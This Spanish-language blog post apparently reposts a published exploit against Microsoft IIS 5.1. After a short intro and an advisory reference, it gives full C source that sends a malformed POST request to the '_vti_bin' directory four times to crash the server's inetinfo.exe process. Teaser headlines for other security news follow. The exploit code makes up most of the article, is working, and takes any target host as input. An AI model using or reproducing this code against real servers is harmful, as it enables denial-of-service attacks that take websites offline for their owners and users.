Exploit contra el Microsoft IIS


Exploit publicado en frsirt.com que ataca el Internet Information Server (ISS) usando HTTP mal formados causando una denegación de servivios, realizado por ATmaCA, Inge Henriksen del sitio web spyinstructors.com.





Enlace relacionado:
http://www.xombra.com/go_news.php?articulo=2119

Advisory ID : FrSIRT/ADV-2005-2963
Rated as : Moderate Risk

/*****************************************************************

Microsoft IIS 5.1 Remote D.o.S Exploit by Kozan

Application: Microsoft IIS (Internet Information Server)
Vendor: Microsoft - http://www.microsoft.com/

Discovered by: Inge Henriksen
Exploit Coded by: Kozan
Credits to ATmaCA, Inge Henriksen
Web: www.spyinstructors.com
Mail: kozan@spyinstructors.com

Vulnerable:
Microsoft Internet Information Server® V5.1

Not vulnerable:
Microsoft Internet Information Server® V5.0
Microsoft Internet Information Server® V6.0

Only folders with Execute Permissions set to 'Scripts & Executables'
are affected, such as the '_vti_bin' directory.

inetinfo.exe will be crashed after exploitation finished successfuly.

Usage: iis51dos.exe [Target Url or IP]

*****************************************************************/

#include <winsock2.h>
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "ws2_32.lib")


char *HttpHeader(char *pszHost)
{
char szHeader[1000];

wsprintf( szHeader, "POST /_vti_bin/.dll/*/~0 HTTP/1.1\r\n"
"Content-Type: application/x-www-form-urlencoded\r\n"
"Host: %s\r\n"
"Content-Length: 0\r\n\r\n"
, pszHost
);

return szHeader;
}


int main(int argc, char *argv[])
{
fprintf(stdout, "\n\nMicrosoft IIS 5.1 Remote D.o.S Exploit by Kozan\n"
"Bug Discovered by: Inge Henriksen\n"
"Exploit Coded by: Kozan\n"
"Credits to ATmaCA, Inge Henriksen\n"
"www.spyinstructors.com - kozan@spyinstructors.com\n\n"
);

if( argc != 2 )
{
fprintf(stderr, "\n\nUsage:\t%s [WebSiteUrl]\n\n", argv[0]);
return -1;
}

WSADATA wsaData;
struct hostent *pTarget;
struct sockaddr_in addr;
SOCKET sock;

char szHeader[1000], szWebUrl[1000];

lstrcpy(szWebUrl, argv[1]);
lstrcpy(szHeader, HttpHeader(szWebUrl));

if( WSAStartup(0x0101,&wsaData) < 0 )
{
fprintf(stderr, "Winsock error!\n");
return -1;
}

sock = socket(AF_INET,SOCK_STREAM,0);

if( sock == -1 )
{
fprintf(stderr, "Socket error!\n");
return -1;
}

if( (pTarget = gethostbyname(szWebUrl)) == NULL )
{
fprintf(stderr, "Address resolve error!\n");
return -1;
}

memcpy(&addr.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length);
addr.sin_family = AF_INET;
addr.sin_port = htons(80);
memset(&(addr.sin_zero), '\0', 8);

fprintf(stdout, "Please wait while connecting...\n");

if( connect( sock, (struct sockaddr*)&addr, sizeof(struct sockaddr) ) == -1 )
{
fprintf(stderr, "Connection failed!\n");
closesocket(sock);
return -1;
}

fprintf(stdout, "Connected.\n\n");

fprintf(stdout, "Please wait while sending DoS request headers...\n\n");

for( int i=0; i<4; i++ )
{
fprintf(stdout, "Sending %d. request...\n", i+1);

if( send(sock, szHeader, lstrlen(szHeader),0) == -1 )
{
fprintf(stderr, "%d. DoS request header could not sent!\n", i+1);
closesocket(sock);
return -1;
}

fprintf(stdout, "%d. request sent.\n\n", i+1);
}

fprintf(stdout, "Operation completed...\n");
closesocket(sock);
WSACleanup();


return 0;
}



Otras noticias de interés:

Acelerando la conexión a Internet en redes inalámbricas
La conexión a internet puede acelerarse gracias a una nueva aplicación software libre desarrollada por investigadores de la Universidad de Illinois, la tiene como método aprovechar el ancho de banda desperdiciado en las redes inalámbricas....
Denegación de servicio en Adobe Flash Player
Se ha encontrado una vulnerabilidad en Adobe Flash Player que podría ser aprovechada por un atacante remoto para causar una denegación de servicio. ...
Prohibido Prohibir
Diego Saravia escribió un excelente artículo sobre la no prohibición en el uso de software....
Malware usando BITS para descargar ficheros
Gracias a los cortafuegos (Firewalls) que se instalan en el propio ordenador (en contraposición a los externos, que funcionan en el router) el malware lo tiene un poco más difícil para conectarse a Internet y descargarse ficheros. Muchos cortafueg...
¿Será EDoS el próximo DDoS? (Denegación Económica de Sustentabilidad)
Un célebre analista de seguridad ha propuesto un nuevo giro en el modelo tradicional de denegación de servicio en donde los atacantes intencionalmente inflan las cuentas de los usuarios de servicio en la nube hasta que ya no pueden hacer frente al ...
Fallo de ESET en la actualización causa errores en sistemas
Una actualización defectuosa de las definiciones de virus de ESET ha causado un grave problema para los usuarios del software de seguridad....
Robar Cookies HTTPOnly con XSS en webs con Apache
Se ha publicado una vulnerabilidad en servidores Apache descubierta por Norman Hippert que permite robar cookies marcadas con el flag de HTTPOnly por medio de un ataque XSS. El bug ha recibido el CVE-2012-0053 y afecta a las versiones de Apache de la...
Evitar Spam en Twitter
A pesar de los constantes problemas de índole técnico en los que se ha visto envuelto Twitter a lo largo de su historia en Internet, esto no ha logrado que la popularidad de este servicio como la mayor red social de microblogging de la web se haya ...
Redes sociales propician el nacimiento spam 2.0
¿Cuántos correos electrónicos has recibido últimamente donde un amigo te invita a ver su perfil en una red social fantasma nueva? ...
Nueva versión del BugBear (Win32/Bugbear.B)
Este virus se está distribuyendo aceleradamente en las últimas horas por Internet. Se trata de un gusano de envío masivo con capacidad de propagarse también a través de recursos compartidos en red. Infecta archivos con extensión .EXE y finaliza...

Brindanos
un o una


Redes Sociales

Publicidad


Gana Bitcoins desde tu casa

Categorías


Planeta Vaslibre

Blog Roll




Nube de tags

  • anonimato
  • anonimo
  • antivirus
  • apache
  • blog
  • bsd
  • bug
  • centos
  • chrome
  • cifrado
  • computer
  • debian
  • exploit
  • exploits
  • fedora
  • fice
  • firefox
  • forense
  • freebsd
  • gentoo
  • github
  • gnome
  • gnu
  • gpl
  • gtk
  • hack
  • hacking
  • hosting
  • iis
  • informatica
  • internet
  • isos
  • libre
  • licencias
  • linux
  • linuxmint
  • lxde
  • micros
  • mint
  • mit
  • mozilla
  • mysql
  • noticia
  • opensource
  • pgp
  • php
  • sabayon
  • seguridad
  • system
  • tecnologia
  • thunar
  • thunderbird
  • tor
  • troyanos
  • tware
  • ubuntu
  • underground
  • vaslibre
  • virus
  • viserproject
  • vivaldi
  • vulnerabilidades
  • web
  • website
  • windows
  • xanadu
  • xfce
  • xombra